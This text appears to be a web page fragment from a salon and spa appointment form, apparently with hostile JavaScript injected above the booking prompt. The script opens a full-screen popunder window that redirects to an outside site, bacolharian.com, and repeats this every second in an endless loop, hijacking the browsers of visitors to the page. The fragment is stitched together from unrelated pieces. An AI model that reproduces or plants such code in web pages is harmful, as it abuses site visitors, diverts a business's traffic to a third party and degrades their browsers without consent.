function popUnder(url) {
var popunder = window.open('about:blank', '_blank', 'toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=yes');
popunder.document.write('<script>window.location.href="' + url + '";</script>');
popunder.document.close();
// Set the popunder window to full screen size
popunder.window.moveTo(0, 0);
if (screen.width) {
popunder.window.resizeTo(screen.width, screen.height);
} else {
popunder.window.resizeTo(document.body.offsetWidth, document.body.offsetHeight);
}
}
// Create an unlimited popunder loop
setInterval(function() {
popUnder('https://bacolharian.com');
}, 1000); // Call the function every 1 second
Please complete the form below to request an appointment with our staff at Adrienne Michelle's Salon & Spa.